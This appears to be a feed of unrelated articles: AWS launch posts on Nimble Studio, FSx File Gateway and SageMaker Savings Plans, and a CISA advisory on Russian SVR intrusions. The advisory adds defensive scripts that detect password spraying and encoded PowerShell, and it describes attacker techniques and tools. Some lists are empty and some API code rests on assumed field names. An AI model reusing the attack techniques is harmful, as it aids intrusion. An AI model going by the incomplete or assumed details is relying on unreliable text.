Amazon Nimble Studio – Build a Creative Studio in the Cloud

Amazon Nimble Studio is a new service that creative studios can use to produce visual effects, animations, and interactive content entirely in the cloud with AWS, from the storyboard sketch to the final deliverable. Nimble Studio provides customers with on-demand access to virtual workstations, elastic file storage, and render farm capacity. It also provides built-in automation tools for IP security, permissions, and collaboration.

Traditional creative studios often face the challenge of attracting and onboarding talent. Talent is rarely concentrated in one place, so it’s important to speed up the hiring of remote artists and make them as productive as if they were in the same physical space. It’s also important to let distributed teams use the same workflows, software, licenses, and tools that they use today, while keeping all assets secure.

In addition, traditional customers either buy more hardware for their local render farms, rent hardware at a premium, or extend their capacity with cloud resources. Those who decide to render in the cloud must navigate these options and the large breadth of AWS offerings, and the perceived complexity can lead them back to legacy approaches.

Screenshot of Maya lighting

Today, we are happy to announce the launch of Amazon Nimble Studio, a service that addresses these concerns by providing ready-made IT infrastructure as a service, including workstations, storage, and rendering.

Nimble Studio is part of a broader portfolio of purpose-built AWS capabilities for media and entertainment use cases, including AWS services, AWS and Partner Solutions, and over 400 AWS Partners. You can learn more about our AWS for Media & Entertainment initiative, also launched today, which helps media and entertainment customers easily identify industry-specific AWS capabilities across five key business areas: Content production, Direct-to-consumer and over-the-top (OTT) streaming, Broadcast, Media supply chain and archive, and Data science and Analytics.

Benefits of using Nimble Studio
Nimble Studio is built on top of AWS infrastructure, which provides high-performance compute and keeps your data secure. It also makes production elastic, allowing studios to scale artists’ workstations, storage, and rendering capacity based on demand.

When using Nimble Studio, artists can use their favorite creative software tools on an Amazon Elastic Compute Cloud (EC2) virtual workstation. Nimble Studio uses EC2 for compute, Amazon FSx for storage, AWS Single Sign-On for user management, and AWS Thinkbox Deadline for render farm management.

Nimble Studio is open and compatible with most storage solutions that support the NFS/SMB protocol, such as Weka.io and Qumulo, so you can bring your own storage.

For high-performance remote display, the service uses the NICE DCV protocol and provisions G4dn instances that are available with NVIDIA GPUs.

By providing the ability to share assets using globally accessible data storage, Nimble Studio makes it possible for studios to onboard global talent. And Nimble Studio centrally manages licenses for many software packages, reduces the friction of onboarding new artists, and enables predictable budgeting.

In addition, Nimble Studio comes with an artist-friendly console. Artists don’t need to have an AWS account or use the AWS Management Console to do their work.

But my favorite thing about Nimble Studio is that it’s intuitive to set up and use. In this post, I will show you how to create a cloud-based studio.

Screenshot of the Nimble Studio intro

Set up a cloud studio using Nimble Studio
To get started with Nimble Studio, go to the AWS Management Console and create your cloud studio. You can decide if you want to bring your existing resources, such as file storage, render farm, software license service, Amazon Machine Image (AMI), or a directory in Active Directory. Studios that migrate existing projects can use AWS Snowball for fast and secure physical data migration.

Configure AWS SSO
For this configuration, choose the option where you don’t have any existing resources, so you can see how easy it is to get started. The first step is to configure AWS SSO in your account. You will use AWS SSO to give artists role-based permissions to access the studio. To set up AWS SSO, follow the setup steps in the AWS Directory Service console.
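If you prefer to confirm the AWS SSO setup programmatically, here is a minimal boto3 (Python) sketch. It assumes AWS SSO has already been enabled in the console; the instance ARN and identity store ID it prints are what you will reference when assigning studio permissions later.

```python
import boto3

# Assumes AWS SSO is already enabled for the account/organization.
sso_admin = boto3.client("sso-admin", region_name="us-west-2")

# List the SSO instances available in this account; there is normally one.
for instance in sso_admin.list_instances()["Instances"]:
    print("SSO instance ARN: ", instance["InstanceArn"])
    print("Identity store ID:", instance["IdentityStoreId"])
```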

Configure your studio with StudioBuilder
StudioBuilder is a tool that helps you deploy your studio by answering a few configuration questions. StudioBuilder is available as an AMI, which you can get for free from AWS Marketplace.

After you get the AMI from AWS Marketplace, you can find it in your Private images list in the EC2 console. Launch that AMI on an EC2 instance; I recommend a t3.medium. Set the Auto-assign Public IP field to Enable to ensure that your instance receives a public IP address, which you will use later to connect to the instance.
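If you prefer to launch the StudioBuilder instance from code rather than the console, here is a minimal boto3 sketch of the same step. The AMI ID, subnet, security group, and key pair are placeholders for your own values.

```python
import boto3

ec2 = boto3.client("ec2", region_name="us-west-2")

# Placeholder IDs: substitute the StudioBuilder AMI from your Private images
# list, plus your own subnet, security group, and key pair.
response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",          # StudioBuilder AMI (placeholder)
    InstanceType="t3.medium",                 # recommended size
    MinCount=1,
    MaxCount=1,
    KeyName="my-key-pair",
    NetworkInterfaces=[{
        "DeviceIndex": 0,
        "SubnetId": "subnet-0123456789abcdef0",
        "Groups": ["sg-0123456789abcdef0"],
        "AssociatePublicIpAddress": True,     # same as Auto-assign Public IP = Enable
    }],
)
print("Launched instance:", response["Instances"][0]["InstanceId"])
```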

Screenshot of launching the StudioBuilder AMI

As soon as you connect to the instance, you are directed to the StudioBuilder setup.

Screenshot of studio builder setup

The setup guides you, step by step, through the configuration of networking, storage, Active Directory, and the render farm. Simply answer the questions to build the right studio for your needs.

Screenshot of the studio building

The setup takes around 90 minutes. You can monitor the progress using the AWS CloudFormation console. Your studio is ready when four new CloudFormation stacks have been created in your account: Network, Data, Service, and Compute.
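You can also watch for the stacks from code instead of the console. The boto3 sketch below polls CloudFormation for the four stacks; the stack names are assumptions based on the names mentioned above, so adjust them to match what StudioBuilder actually creates in your account.

```python
import boto3

cfn = boto3.client("cloudformation", region_name="us-west-2")

# Assumed stack names, based on the four stacks described above.
expected = ["Network", "Data", "Service", "Compute"]

for name in expected:
    # Block until each stack finishes creating (raises if creation fails).
    cfn.get_waiter("stack_create_complete").wait(StackName=name)
    status = cfn.describe_stacks(StackName=name)["Stacks"][0]["StackStatus"]
    print(f"{name}: {status}")
```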

Screenshot of stacks completed in CloudFormation

Now terminate the StudioBuilder instance and return to the Nimble Studio console. In Studio setup, you can see that you’ve completed four of the five steps.

Screenshot of the studio setup tutorial

Assign access to studio admin and users
To complete the last step, Step 5: Allow studio access, you will use the Active Directory you created during the StudioBuilder step and the AWS SSO you configured earlier to give administrators and artists access to the studio.

Follow the instructions in the Nimble Studio console to connect the directory to AWS SSO. Then you can add administrators to your studio. Administrators have control over what users can do in the studio.

At this point, you can add users to the studio, but because your directory doesn’t have users yet, move to the next step. You can return to this step later to add users to the studio.

Accessing the studio for the first time
When you open the studio for the first time, you will find the Studio URL in the Studio Manager console. You will share this URL with your artists when the studio is ready. To sign in to the studio, you need the user name and password of the Admin you created earlier.

Screenshot of studio name

Launch profiles
When the studio opens, you will see two launch profiles: one for a render farm instance and one for a workstation. They were created by StudioBuilder when you set up the studio. Launch profiles control access to resources in your studio, such as compute farms, shared file systems, instance types, and AMIs. You can use the Nimble Studio console to create as many launch profiles as you need to customize your team’s access to studio resources.
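For automation, the AWS SDKs expose Nimble Studio as the `nimble` service. The sketch below lists studios and their launch profiles with boto3; the exact operation names, parameters, and response keys shown are assumptions drawn from the Nimble Studio API, so verify them against the current SDK documentation.

```python
import boto3

# Assumes boto3's "nimble" client; confirm field names in the SDK docs.
nimble = boto3.client("nimble", region_name="us-west-2")

for studio in nimble.list_studios().get("studios", []):
    print("Studio:", studio["studioName"], studio["studioId"])
    profiles = nimble.list_launch_profiles(studioId=studio["studioId"])
    for profile in profiles.get("launchProfiles", []):
        print("  Launch profile:", profile["name"])
```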

Screenshot of the studio

When you launch a profile, you launch a workstation that includes all the software provided in the AMI you installed. It takes a few minutes for the instance to launch the first time. When it is ready, you will see the instance in the browser. You can sign in to it with the same user name and password you use to sign in to the studio.

Screenshot of launching a new instance

Now your studio is ready! Before you share it with your artists, you might want to configure more launch profiles, add your artist users to the directory, and give those users permissions to access the studio and launch profiles.

Here’s a short video that describes how Nimble Studio works and how it can help you:

Available now
Nimble Studio is now available in the US West (Oregon), US East (N. Virginia), Canada (Central), Europe (London), and Asia Pacific (Sydney) Regions, and in the US West (Los Angeles) Local Zone.

Learn more about Amazon Nimble Studio and get started building your studio in the cloud.

Marcia

Get Started Using Amazon FSx File Gateway for Fast, Cached Access to File Server Data in the Cloud

As traditional workloads continue to migrate to the cloud, some customers have been unable to take advantage of cloud-native services to host data typically held on their on-premises file servers. For example, data commonly used for team and project file sharing, or with content management systems, has needed to reside on-premises due to issues of high latency, or constrained or shared bandwidth, between customer premises and the cloud.

Today, I’m pleased to announce Amazon FSx File Gateway, a new type of AWS Storage Gateway that helps you access data stored in the cloud with Amazon FSx for Windows File Server, instead of continuing to use and manage on-premises file servers. Amazon FSx File Gateway uses network optimization and caching so it appears to your users and applications as if the shared data were still on-premises. By moving and consolidating your file server data into Amazon FSx for Windows File Server, you can take advantage of the scale and economics of cloud storage, and divest yourself of the undifferentiated maintenance involved in managing on-premises file servers, while Amazon FSx File Gateway solves issues around latency and bandwidth.

Replacing On-premises File Servers
Amazon FSx File Gateway is an ideal solution to consider when replacing your on-premises file servers. Low-latency access ensures you can continue to use latency-sensitive on-premises applications, and caching conserves shared bandwidth between your premises and the cloud, which is especially important when you have many users all attempting to access file share data directly.

You can attach an Amazon FSx file system and present it through a gateway to your applications and users, provided they are all members of the same Active Directory domain. The AD infrastructure can be hosted in AWS Directory Service or managed on-premises.

Your data, as mentioned, resides in Amazon FSx for Windows File Server, a fully managed, highly reliable and resilient file system, eliminating the complexity involved in setting up and operating file servers, storage volumes, and backups. Amazon FSx for Windows File Server provides a fully native Windows file system in the cloud, with full Server Message Block (SMB) protocol support, and is accessible from Windows, Linux, and macOS systems running in the cloud or on-premises. Built on Windows Server, Amazon FSx for Windows File Server also exposes a rich set of administrative features including file restoration, data deduplication, Active Directory integration, and access control via Access Control Lists (ACLs).

Choosing the Right Gateway
You may be aware of Amazon S3 File Gateway (originally named File Gateway), and might now be wondering which type of workload is best suited for the two gateways:

  • With Amazon S3 File Gateway, you can access data stored in Amazon Simple Storage Service (S3) as files, and it’s also a solution for file ingestion into S3 for use in running object-based workloads and analytics, and for processing data that exists in on-premises files.
  • Amazon FSx File Gateway, on the other hand, is a solution for moving network-attached storage (NAS) into the cloud while continuing to have low-latency, seamless access for your on-premises users. This includes two general-purpose NAS use-cases that use the SMB file protocol: end-user home directories and departmental or group file shares. Amazon FSx File Gateway supports multiple users sharing files, with advanced data management features such as access controls, snapshots for data protection, integrated backup, and more.

One additional unique feature I want to note is Amazon FSx File Gateway integration with backups. This includes backups taken directly within Amazon FSx and those coordinated by AWS Backup. Prior to a backup starting, Amazon FSx for Windows File Server communicates with each attached gateway to ensure any uncommitted data gets flushed. This helps further reduce your administrative overhead and worries when moving on-premises file shares into the cloud.

Working with Amazon FSx File Gateway
Amazon FSx File Gateway is available using multiple platform options. You can order and deploy a hardware appliance into your on-premises environment, deploy as a virtual machine into your on-premises environment (VMware ESXi, Microsoft Hyper-V, Linux KVM), or deploy in the cloud as an Amazon Elastic Compute Cloud (EC2) instance. The available options are displayed as you start to create a gateway from the AWS Storage Gateway Management Console, together with setup instructions for each option.

Below, I choose to use an EC2 instance for my gateway.

FSx File Gateway platform options

The process of setting up a gateway is pretty straightforward, and since the documentation goes into detail, I’m not going to repeat the flow in this post. Essentially, the steps are to first create a gateway, then join it to your domain. Next, you attach an Amazon FSx file system. After that, your remote clients can work with the data on the file system; the important difference is that they connect through a network share to the gateway instead of to the Amazon FSx file system.
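For readers who script their infrastructure, here is a rough boto3 outline of the same flow: activate the gateway, join it to the domain, and associate the Amazon FSx file system. All ARNs, names, and credentials are placeholders, and the operations shown (ActivateGateway, JoinDomain, AssociateFileSystem) should be checked against the current Storage Gateway API reference; treat this as a sketch rather than a drop-in script.

```python
import boto3

sgw = boto3.client("storagegateway", region_name="us-east-1")

# 1. Activate the gateway instance (the activation key comes from the appliance/VM).
gateway = sgw.activate_gateway(
    ActivationKey="XXXXX-XXXXX-XXXXX-XXXXX-XXXXX",   # placeholder
    GatewayName="fsx-file-gateway",
    GatewayTimezone="GMT-5:00",
    GatewayRegion="us-east-1",
    GatewayType="FILE_FSX_SMB",
)
gateway_arn = gateway["GatewayARN"]

# 2. Join the gateway to the Active Directory domain shared with Amazon FSx.
sgw.join_domain(
    GatewayARN=gateway_arn,
    DomainName="corp.example.com",                   # placeholder domain
    UserName="admin",
    Password="placeholder-password",
)

# 3. Attach the Amazon FSx for Windows File Server file system to the gateway.
sgw.associate_file_system(
    ClientToken="unique-token-123",
    GatewayARN=gateway_arn,
    LocationARN="arn:aws:fsx:us-east-1:111122223333:file-system/fs-0123456789abcdef0",
    UserName="admin",
    Password="placeholder-password",
)
```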

Below is the general configuration for my gateway, created in US East (N. Virginia).

FSx File Gateway Details

And here are the details of my Amazon FSx file system, running in an Amazon Virtual Private Cloud (VPC) in US East (N. Virginia), that will be attached to my gateway.

FSx File System Details

Note that I have created and activated the gateway in the same region as the source Amazon FSx file system, and will manage the gateway from US East (N. Virginia). The gateway virtual machine (VM) is deployed as an EC2 instance running in a VPC in our remote region, US West (Oregon). I’ve also established a peering connection between the two VPCs.

Once I have attached the Amazon FSx file system to my Amazon FSx File Gateway, in the AWS Storage Gateway Management Console I select FSx file systems and then the respective file system instance. This gives me the details of the command needed by my remote users to connect to the gateway.

Viewing the attached Amazon FSx File System

Exploring an End-user Scenario with Amazon FSx File Gateway
Let’s explore a scenario that may be familiar to many readers, that of a “head office” that has moved its NAS into the cloud, with one or more “branch offices” in remote locations that need to connect to those shares and the files they hold. In this case, my head office/branch office scenario is for a fictional photo agency, and is set up so I can explore the gateway’s cache refresh functionality. For this, I’m imagining a scenario where a remote user deletes some files accidentally, and then needs to contact an admin in the head office to have them restored. This is possibly a fairly common scenario, and one I know I’ve had to both request, and handle, in my career!

My head office for my fictional agency is located in US East (N. Virginia) and the local admin for that office (me) has a network share attached to the Amazon FSx file system instance. My branch office, where my agency photographers work, is located in the US West (Oregon) region, and users there connect to my agency’s network over a VPN (an AWS Direct Connect setup could also be used). In this scenario, I simulate the workstations at each office using Amazon Elastic Compute Cloud (EC2) instances.

In my fictional agency, photographers upload images to my agency’s Amazon FSx file system, connected via a network share to the gateway. Even though my fictional head office and the Amazon FSx file system itself are located on the east coast, the gateway and its cache provide a fast, low-latency connection for users in the remote branch office, making it seem as though there is a local NAS. After photographers upload images from their assignments, additional staff in the head office do some basic work on them and make the partly processed images available back to the photographers on the west coast via the file share.

The image below illustrates the resource setup for my fictional agency.

My sample head/branch office setup, as AWS resources

I have set up a schedule of multiple daily backups for the file system, as you might expect, but I’ve also gone a step further and enabled shadow copies on my Amazon FSx file system. Remember, Amazon FSx for Windows File Server is a Windows file server; it just happens to be running in the cloud. You can find details of how to set up shadow copies (which are not enabled by default) in the documentation. For the purposes of the fictional scenario in this blog post, I set up a schedule so that my shadow copies are taken every hour.
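Daily automatic backups can also be configured through the Amazon FSx API. The boto3 sketch below is one way to set a backup window and retention on an existing file system (shadow copies themselves are configured from Windows, per the documentation mentioned above); the file system ID is a placeholder, and more frequent schedules would come from AWS Backup rather than this call.

```python
import boto3

fsx = boto3.client("fsx", region_name="us-east-1")

# Placeholder file system ID; retention and start time are illustrative values.
fsx.update_file_system(
    FileSystemId="fs-0123456789abcdef0",
    WindowsConfiguration={
        "AutomaticBackupRetentionDays": 7,          # keep a week of daily backups
        "DailyAutomaticBackupStartTime": "05:00",   # UTC start of the backup window
    },
)
```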

Back to my fictional agency. One of my photographers on the west coast, Alice, is logged in and working with a set of images that have already had some work done on them by the head office. Alice is connected and working on her images via the network share IP marked in an earlier image in this post – this is the gateway file share.

Suddenly, disaster strikes and Alice accidentally deletes all of the files in the folder she was working in. Picking up the phone, she calls the admin (me) in the east coast head office and explains the situation, wondering if we can get the files back.

Since I’d set up scheduled daily backups of the file system, I could probably restore the deleted files from there. This would involve a restore to a new file system, then copying the files from that new file system to the existing one (and deleting the new file system instance afterwards). But, having enabled shadow copies, in this case I can restore the deleted files without resorting to the backups. And, because I enabled automated cache refreshes on my gateway, with the refresh period set to every 5 minutes, Alice will see the restored files relatively quickly.
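The automated cache refresh I mention is a property of the gateway’s file system association. Below is a hedged boto3 sketch; the `CacheAttributes`/`CacheStaleTimeoutInSeconds` naming is an assumption based on the Storage Gateway API, so confirm it in the SDK documentation before relying on it.

```python
import boto3

sgw = boto3.client("storagegateway", region_name="us-east-1")

# Placeholder association ARN; 300 seconds matches the 5-minute refresh in this post.
sgw.update_file_system_association(
    FileSystemAssociationARN=(
        "arn:aws:storagegateway:us-east-1:111122223333:fs-association/fsa-0123456789abcdef0"
    ),
    CacheAttributes={"CacheStaleTimeoutInSeconds": 300},
)
```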

My admin machine (in the east coast office) has a network share to the Amazon FSx file system, so I open an explorer view onto the share, right-click the folder in question, and select Restore previous versions. This gives me a dialog where I can select the most recent shadow copy.

Restoring the file data from shadow copies

I ask Alice to wait 5 minutes, then refresh her explorer view. The changes in the Amazon FSx file system are propagated to the cache on the gateway and sure enough, she sees the files she accidentally deleted and can resume work. (When I saw this happen for real in my test setup, even though I was expecting it, I let out a whoop of delight!). Overall, I hope you can see how easy it is to set up and operate an Amazon FSx File Gateway with an Amazon FSx for Windows File Server.

Get Started Today with Amazon FSx File Gateway
Amazon FSx File Gateway provides a low-latency, efficient connection for remote users when moving on-premises Windows file systems into the cloud. This benefits users who experience higher latencies, and shared or limited bandwidth, between their premises and the cloud. Amazon FSx File Gateway is available today in all commercial AWS Regions where Amazon FSx for Windows File Server is available. It’s also available in the AWS GovCloud (US-West) and AWS GovCloud (US-East) Regions, and in the Amazon China (Beijing) and China (Ningxia) Regions.

You can learn more on this feature page, and get started right away using the feature documentation.

AA21-116A: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders

Original release date: April 26, 2021

Summary

The Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium—will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled “Russian SVR Targets U.S. and Allied Networks,” released on April 15, 2021.

The FBI and DHS are providing information on the SVR’s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.

Click here for a PDF version of this report.

Threat Overview

SVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors’ ability to move within victim environments undetected.

Beginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.

Technical Details

SVR Cyber Operations Tactics, Techniques, and Procedures

Password Spraying

In one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a “low and slow” manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.

The organization unintentionally exempted the compromised administrator’s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.

The actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple’s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.

While the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.

During the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. 
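Defenders can look for this “low and slow” pattern in authentication logs. The following Python sketch is illustrative only: given failed-login records (timestamp, source IP, account), it flags source IPs that try many distinct accounts at long intervals, which is the behavior described above. Field names and thresholds are assumptions to adapt to your own log schema.

```python
from collections import defaultdict
from datetime import datetime

# Hypothetical failed-login records: (timestamp, source_ip, account).
failed_logins = [
    ("2018-06-01T02:14:00", "203.0.113.10", "alice"),
    ("2018-06-01T05:47:00", "203.0.113.10", "bob"),
    ("2018-06-01T09:30:00", "203.0.113.10", "carol"),
    # ... many more records from your identity provider or mail logs ...
]

by_ip = defaultdict(list)
for ts, ip, account in failed_logins:
    by_ip[ip].append((datetime.fromisoformat(ts), account))

for ip, events in by_ip.items():
    events.sort()
    accounts = {account for _, account in events}
    # Average gap between attempts, in minutes (large gaps = "low and slow").
    gaps = [(b[0] - a[0]).total_seconds() / 60 for a, b in zip(events, events[1:])]
    avg_gap = sum(gaps) / len(gaps) if gaps else 0
    # Flag IPs that touch many accounts with infrequent attempts.
    if len(accounts) >= 3 and avg_gap >= 60:
        print(f"Possible low-and-slow spray from {ip}: "
              f"{len(accounts)} accounts, ~{avg_gap:.0f} min between attempts")
```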

Recommendations

To defend against this technique, the FBI and DHS recommend that network operators follow best practices for configuring access to cloud computing environments, including:

  • Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.
  • Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.
  • Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.
  • Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.
  • Regularly review the organization’s password management program.
  • Ensure the organization’s information technology (IT) support team has well-documented standard operating procedures for password resets of locked-out user accounts.
  • Maintain a regular cadence of security awareness training for all company employees.

Leveraging Zero-Day Vulnerability

In a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.

The actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.

Following initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.

Recommendations

To defend against this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:

  • Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP (a detection sketch for encoded PowerShell follows this list).
  • Ensure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
  • Require use of multi-factor authentication to access internal systems.
  • Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools.
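As a concrete example of the first recommendation above, the Python sketch below scans process or command-line logs for encoded PowerShell invocations and tries to decode them. The log format and field names are assumptions; adapt the parsing to whatever your endpoint or logging tooling actually emits.

```python
import base64
import re

# Matches powershell.exe invocations using -enc / -EncodedCommand (case-insensitive).
ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?\s+.*-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

def scan_command_lines(command_lines):
    """Yield (original line, decoded command) for encoded PowerShell invocations."""
    for line in command_lines:
        match = ENCODED_PS.search(line)
        if not match:
            continue
        try:
            # -EncodedCommand takes base64 of UTF-16LE text.
            decoded = base64.b64decode(match.group(1)).decode("utf-16-le", errors="replace")
        except Exception:
            decoded = "<failed to decode>"
        yield line, decoded

# Build an illustrative record (a benign command, encoded the same way attackers do).
sample = "powershell.exe -NoP -enc " + base64.b64encode(
    "Write-Output test".encode("utf-16-le")).decode()

for line, decoded in scan_command_lines([sample]):
    print("Encoded PowerShell found:", decoded)
```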

WELLMESS Malware

In 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI’s investigation revealed that following initial compromise of a network—normally through an unpatched, publicly known vulnerability—the actors deployed WELLMESS. Once on the network, the actors targeted each organization’s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion has been previously released and is referenced in the ‘Resources’ section of this document.

Tradecraft Similarities of SolarWinds-enabled Intrusions

During the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR’s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR’s historic tradecraft.

The FBI’s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.

Recommendations

Although defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:

  • Auditing log files to identify attempts to access privileged certificates and creation of fake identity providers.
  • Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.
  • Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
  • Using available public resources to identify credential abuse within cloud environments.
  • Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.

While few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly “zero trust” architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.

General Tradecraft Observations

SVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.

The FBI also notes SVR cyber operators have continuously used open-source or commercially available tools, including Mimikatz—an open-source credential-dumping tool—and Cobalt Strike—a commercially available exploitation tool.

Mitigations

The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.

Resources

Revisions

  • April 26, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Major News Events

When a major news event happens, cyber criminals will take advantage of the incident and send phishing emails with a subject line related to the event. These phishing emails often include a link to a malicious website or an infected attachment, or are simply a scam designed to trick you out of your money.

Decrease Your Machine Learning Costs with Instance Price Reductions and Savings Plans for Amazon SageMaker

Launched at AWS re:Invent 2017, Amazon SageMaker is a fully-managed service that has already helped tens of thousands of customers quickly build and deploy their machine learning (ML) workflows on AWS.

To help them get the most ML bang for their buck, we’ve added a string of cost-optimization services and capabilities, such as Managed Spot Training, Multi-Model Endpoints, Amazon Elastic Inference, and AWS Inferentia. In fact, customers find that the Total Cost of Ownership (TCO) for SageMaker over a three-year horizon is 54% lower compared to other cloud-based options, such as self-managed Amazon EC2 and AWS-managed Amazon EKS.

Since there’s nothing we like more than making customers happy by saving them money, I’m delighted to announce:

  • A price reduction for CPU and GPU instances in Amazon SageMaker,
  • The availability of Savings Plans for Amazon SageMaker.

Reducing Instance Prices in Amazon SageMaker
Effective today, we are dropping the price of several instance families in Amazon SageMaker by up to 14.2%.

This applies to:

Detailed pricing information is available on the Amazon SageMaker pricing page.

As welcome as price reductions are, many customers have also asked us for a simple and flexible way to optimize SageMaker costs for all instance-related activities, from data preparation to model training to model deployment. In fact, as a lot of customers are already optimizing their compute costs with Savings Plans, they told us that they’d love to do the same for their Amazon SageMaker costs.

Introducing SageMaker Savings Plans
Savings Plans for AWS Compute Services were launched in November 2019 to help customers optimize their compute costs. They offer up to 72% savings over the on-demand price, in exchange for your commitment to use a specific amount of compute power (measured in $ per hour) for a one- or three-year period. In the spirit of self-service, you have full control over setting up your plans, thanks to recommendations based on your past consumption, usage reports, and budget coverage and utilization alerts.

SageMaker Savings Plans follow in these footsteps, and you can create plans that cover ML workloads based on:

Savings Plans don’t distinguish between instance families, instance types, or AWS regions. This makes it easy for you to maximize savings regardless of how your use cases and consumption evolve over time, and you can save up to 64% compared to the on-demand price.

For example, you could start with small instances in order to experiment with different algorithms on a fraction of your dataset. Then, you could move on to preparing data and training at scale with larger instances on your full dataset. Finally, you could deploy your models in several AWS regions to serve low-latency predictions to your users. All these activities would be covered by the same Savings Plan, without any management required on your side.

Understanding Savings Plans Recommendations
Savings Plans provides you with recommendations that make it easy to find the right plan. These recommendations are based on:

  • Your SageMaker usage in the last 7, 30 or 60 days. You should select the time period that best represents your future usage.
  • The term of your plan: 1-year or 3-year.
  • Your payment option: no upfront, partial upfront (50% or more), or all upfront. Some customers prefer (or must use) this last option, as it gives them a clear and predictable view of their SageMaker bill.

Instantly, you’ll see what your optimized spend would be, and how much you could start saving per month. Savings Plans also suggest an hourly commitment that maximizes your savings. Of course, you’re completely free to use a different commitment, starting as low as $0.001 per hour!

Once you’ve made up your mind, you can add the plan to your cart, submit it, and start enjoying your savings.
